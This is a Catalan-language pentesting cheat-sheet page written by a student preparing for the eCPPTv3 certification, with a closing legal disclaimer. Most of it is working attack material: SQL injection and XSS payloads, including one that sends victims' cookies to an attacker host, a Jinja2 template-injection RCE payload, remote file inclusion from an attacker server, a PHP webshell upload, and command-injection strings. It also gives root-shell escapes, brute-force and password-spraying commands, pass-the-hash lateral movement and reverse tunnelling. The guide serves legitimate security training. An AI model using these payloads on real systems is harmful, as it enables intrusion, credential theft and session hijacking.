Guia actualitzada 2025

Hackeja
amb Català

La teva guia completa en ciberseguretat i pentesting. Des de novell fins a professional, tot en català.

root@hackeja:~#
$ whoami
pentester_català
$ cat benvinguda.txt
Benvingut/da a la guia més completa de ciberseguretat en català!
→ Web Exploitation (SQLi, XSS, SSTI, SSRF...)
→ Active Directory (Kerberos, BloodHound, DCSync...)
→ Privilege Escalation (Linux & Windows)
$ ./començar.sh
12+
Seccions
100+
Comandes
50+
Eines
Coneixement
📋

Metodologia General

El teu full de ruta per a qualsevol màquina

📊

Diferències per Nivell

Easy: Recon → Exploit → Shell → Privesc → Root

Medium: Recon → Enum AD/Web → Credencials → Moviment lateral → Privesc

Hard: Recon → Bypass → Pivot → AD avançat/ADCS → DA

🗺️

Full de Ruta Universal

1. Recon inicial

Escaneig complet de ports TCP amb Nmap. Mirar ports AD: 88, 389/636, 445, 135, 5985/5986, 3389.

2. Enumeració per servei

HTTP → mapes de rutes. SMB → comparticions. LDAP → usuaris, grups.

3. Cerca de credencials

Fitxers .txt, .config, .ini, .ps1, .bak... Comparticions SMB, scripts de login, GPP.

4. Accés inicial

Webshell via vulnerabilitats, WinRM, SSH, RDP, psexec.py / wmiexec.py

5. Post-explotació

Windows: whoami /all, systeminfo. Linux: id, sudo -l, SUID. Llançar WinPEAS/LinPEAS.

6. Active Directory

BloodHound, AS-REP roast, Kerberoast, secretsdump.py, Pass-the-Hash/Ticket.

📡

Port Scanning amb Nmap

nmap_scan.sh
# Escaneig complet TCP ràpid
ports=$(nmap -p- --min-rate=1000 -T4 $IP | grep ^[0-9] | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')

# Escaneig detallat
nmap -sC -sV -p$ports $IP -oA scan

# UDP essencial
sudo nmap -sU --top-ports 200 $IP
🏢

Ports AD

53 DNS | 88 Kerberos | 135 RPC

389/636 LDAP | 445 SMB | 3389 RDP

5985/5986 WinRM | 3268 Global Catalog

🌐

Ports Web

80 HTTP | 443 HTTPS

8080/8443 HTTP Alt | 3000 Node.js

5000 Flask | 9000 PHP-FPM

🌐

Web Exploitation

Vulnerabilitats en aplicacions web

💉

SQL Injection (SQLi)

Inserir codi SQL maliciós en consultes de bases de dades per llegir o modificar dades.

sqli.txt
# Bypass autenticació
' OR '1'='1
' OR 1=1 -- -
admin'--

# UNION-based
' UNION SELECT NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
sqlmap
# Detecció automàtica
sqlmap -u "http://target.com/page.php?id=1" --dbs

# Amb petició de Burp
sqlmap -r login.req --batch --dump

Cross-Site Scripting (XSS)

Injectar JavaScript en pàgines visitades per altres usuaris.

<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<script>document.location='http://atacant/steal?c='+document.cookie</script>
📝

SSTI (Server-Side Template Injection)

Injectar expressions en plantilles (Jinja2, Twig) per executar codi.

# Proves inicials
{{7*7}} → hauria de sortir 49

# RCE (Jinja2/Flask)
{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}
🔀

SSRF

Forçar el servidor a fer peticions a adreces internes.

# Metadata AWS
http://169.254.169.254/latest/meta-data/

# Serveis interns
http://localhost:8080/admin
📂

LFI/RFI

Incloure fitxers no previstos (locals o remots).

# LFI
?page=../../../../etc/passwd

# RFI
?page=http://atacant/shell.txt
💻

Command Injection

# Separadors
8.8.8.8; whoami
8.8.8.8 && whoami
8.8.8.8 | whoami
$(whoami)

# Bypass espais
cat${IFS}/etc/passwd
📤

File Upload

# Doble extensió
evil.php.png

# Magic bytes + codi
GIF89a; <?php system($_GET['cmd']); ?>
⬆️

Privilege Escalation

De usuari normal a root/SYSTEM

🐧 Linux Privilege Escalation

🔍

Checks Bàsics

id && whoami && hostname
sudo -l
uname -a
cat /etc/passwd
find / -perm -4000 -type f 2>/dev/null  # SUID
getcap -r / 2>/dev/null  # Capabilities
📄

SUID

# Si find té SUID
find . -exec /bin/sh \; -quit

# Consultar GTFOBins!
🔓

Sudo Abuse

sudo vim -c '!bash'
sudo python -c 'import os; os.system("/bin/bash")'

Cron Jobs

cat /etc/crontab
ls -la /etc/cron*
# Buscar scripts modificables
🛤️

PATH Hijacking

echo '/bin/bash' > /tmp/tar
chmod +x /tmp/tar
export PATH=/tmp:$PATH

🪟 Windows Privilege Escalation

🔍

Checks Bàsics

whoami /all
hostname && systeminfo
net user && net localgroup administrators
🎭

SeImpersonatePrivilege

Si tens aquest privilegi, pots impersonar SYSTEM!

whoami /priv
PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"
📝

Unquoted Service Path

wmic service get name,pathname | findstr /i /v "c:\\windows"
📦

AlwaysInstallElevated

reg query HKCU\...\Installer /v AlwaysInstallElevated
🤖

Eines Automàtiques

# LinPEAS / WinPEAS
./linpeas.sh
.\winPEAS.exe

# PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks
📡

Network Attacks

Explotar serveis de xarxa

📁

Enumeració SMB (445)

# Llistar comparticions
smbclient -L //$IP -N
smbmap -H $IP

# Connectar
smbclient //$IP/SHARE -N
smb: \> ls && get fitxer.txt

# enum4linux
enum4linux -a $IP

# rpcclient
rpcclient -U "" -N $IP
rpcclient $> enumdomusers
Comparticions típiques: IPC$ (RPC) | ADMIN$ (C:\Windows) | C$ (disc C:) | SYSVOL (GPO)
📂

Enumeració LDAP

# Usuaris actius
ldapsearch -x -H ldap://$IP -D 'DOMINI\\usuari' -w 'PASS' \
  -b "DC=domini,DC=local" "(objectClass=user)" sAMAccountName

# Comptes amb SPN (Kerberoast)
ldapsearch ... "(&(objectClass=user)(servicePrincipalName=*))"
🔨

Força Bruta amb Hydra

# SSH
hydra -l admin -P passwords.txt ssh://$IP

# FTP
hydra -l admin -P passwords.txt ftp://$IP

# HTTP POST
hydra -L users.txt -P passes.txt $IP http-post-form \
  "/login.php:user=^USER^&pass=^PASS^:F=error"

# SMB
hydra -l admin -P passwords.txt smb://$IP
🌍

DNS

# Transferència de zona
dig axfr empresa.com @ns.empresa.com
📊

SNMP

snmpwalk -v2c -c public $IP
# Prova: public, private
🔑

Password Attacks

Força bruta i cracking

🌐

Online

Contra serveis en directe. Sorollosos i lents.

⚠️ Poden activar bloquejos!
💻

Offline

Quan ja tens el hash, crackeja localment.

✓ Silenciós i ràpid amb GPUs
🌧️

Password Spraying

Una contrasenya contra molts usuaris (evita bloquejos).

# CrackMapExec
cme smb $IP -u users.txt -p 'Summer2025!' --continue-on-success

# Kerbrute (AD)
kerbrute passwordspray --dc DC01 -d DOMINI users.txt 'Password123!'

Hashcat

# Modes comuns:
# 0=MD5 | 100=SHA1 | 1000=NTLM | 1800=sha512crypt
# 13100=Kerberos TGS | 18200=AS-REP

# Diccionari
hashcat -m 1000 hashes.txt rockyou.txt

# Amb regles
hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule

# Força bruta
hashcat -m 1000 hashes.txt -a 3 ?a?a?a?a?a?a
🔪

John the Ripper

john hashes.txt --wordlist=rockyou.txt
john hashes.txt --format=NT
john --show hashes.txt
📖

Diccionaris

/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/

# Generar des d'un web
cewl https://empresa.com -d 2 -m 5 -w wordlist.txt
↔️

Pivoting & Lateral Movement

Moure's per la xarxa interna

Pivoting: Usar un sistema compromès com a pont. Lateral Movement: Moure's entre màquines.

🚇

SSH Port Forwarding

# Local Port Forward
# localhost:8000 → servidorIntern:3000 via pivot
ssh -L 8000:172.16.0.10:3000 usuari@pivot

# Remote Port Forward
ssh -R 8080:localhost:80 usuari@pivot

# Dynamic (SOCKS proxy)
ssh -D 1080 usuari@pivot

# Usar amb proxychains
proxychains nmap -sT -Pn 172.16.0.10
🔗

Chisel

Tunneling sobre HTTP/WebSocket. Ideal per firewalls.

# Servidor (atacant)
./chisel server -p 8000 --reverse

# Client (víctima)
./chisel client ATACANT:8000 R:1080:socks

# Ara tens SOCKS5 a localhost:1080
⛓️

Proxychains

# Configurar /etc/proxychains.conf
socks5 127.0.0.1 1080

# Usar
proxychains nmap -sT -Pn 10.0.0.0/24
proxychains curl http://10.0.0.5
proxychains evil-winrm -i 10.0.0.5 -u admin
🪟

Lateral Movement Windows

# Pass-the-Hash
cme smb 10.0.0.10 -u usuari -H HASH --exec-method smbexec -x "whoami"
psexec.py DOMINI/usuari@10.0.0.10 -hashes :HASH
wmiexec.py DOMINI/usuari@10.0.0.10 -hashes :HASH
evil-winrm -i 10.0.0.10 -u usuari -H HASH

# RDP
xfreerdp /v:10.0.0.10 /u:usuari /pth:HASH
🎯

Preparació eCPPTv3

Com em vaig preparar per la certificació

📜

Què és l'eCPPTv3?

Durada: 24 hores contínues

Format: Laboratori pràctic + ~45 preguntes

Important: A la v3 NO hi ha informe formal

Focus: Active Directory, Post-explotació Windows, Vulnerabilitats web, Metodologia de pentest.
📚

Estratègia d'Estudi

1. Màquines Pràctiques

  • 5-10 màquines AD (HackTheBox/TryHackMe)
  • 3-5 màquines web vulnerables
  • 3-5 privesc Windows i Linux

2. Eines Preparades

  • LinPEAS, WinPEAS descarregats
  • PowerView, SharpHound llestos
  • Reverse shells en diversos llenguatges
  • Wordlists (rockyou, SecLists)

Estratègia 24 Hores

🕐

H1-2: Recon Global

Escaneig complet de tots els hosts. Anotar ports, serveis, vectors.

🕒

H3-10: Credencials i Accés

Prioritzar vectors que donin credencials: webs, SMB/LDAP, password spraying.

🕙

H10-20: Active Directory

AS-REP, Kerberoast, BloodHound. Moviment lateral. DOCUMENTAR TOT.

🕗

H20-24: Revisió

Verificar informació per respondre les 45 preguntes.

💡

Consells Clau

✓ Enumera més del necessari

La informació és poder.

✓ Pensa en AD quan vegis ports 88/389/445

L'AD és el camí principal.

✓ Guarda TOTES les credencials

Reutilitza-les sempre.

✓ L'objectiu són les 45 preguntes

No només "arribar a DA".

📖

Recursos Recomanats

HackTheBox - Màquines AD i Windows

TryHackMe - Paths de AD i Web

HackTricks - La bíblia del pentesting

PayloadsAllTheThings - Repositori de payloads

GTFOBins - Escalada Linux

LOLBAS - Living Off The Land (Windows)

🎉 El Resultat

La clau és practicar, documentar tot, i mantenir la calma durant les 24 hores. El pivoting a la v3 és més moderat, però has de saber fer port forwarding bàsic i túnels SSH.

👤

Sobre Mi

Qui hi ha darrere d'aquesta guia

👨‍💻

Fuct10n

Estudiant de Ciberseguretat

Hochschule Kaiserslautern

🎯

Qui sóc?

Estudiant d'Informàtica apassionat per la ciberseguretat i el pentesting. Vaig créixer a Catalunya i m'encanta compartir coneixement en català.

Aquesta guia neix de la meva pròpia experiència preparant-me per a la certificació eCPPTv3.

Per què aquesta guia?

Hi ha molt poc material de ciberseguretat en català. Volia crear quelcom que pogués ajudar a la comunitat catalanoparlant.

"Hackeja amb Català" és el meu aportament per fer el pentesting més accessible.

💡

Interessos

  • Pentesting i Red Team
  • Desenvolupament d'apps
  • Active Directory Security
  • CTFs i màquines
🏆

Certificacions

  • eCPPTv3 (en progrés)
  • Estudis en Ciberseguretat
🛠️

Tecnologies

  • Kali Linux
  • Metasploit, Burp Suite
  • Python, Bash
  • SwiftUI, React
⚠️

Avís Legal

Tot el contingut és amb finalitats educatives. L'ús d'aquestes tècniques sense autorització és il·legal. Practica sempre en entorns controlats i amb permís. El pentesting ètic requereix consentiment per escrit.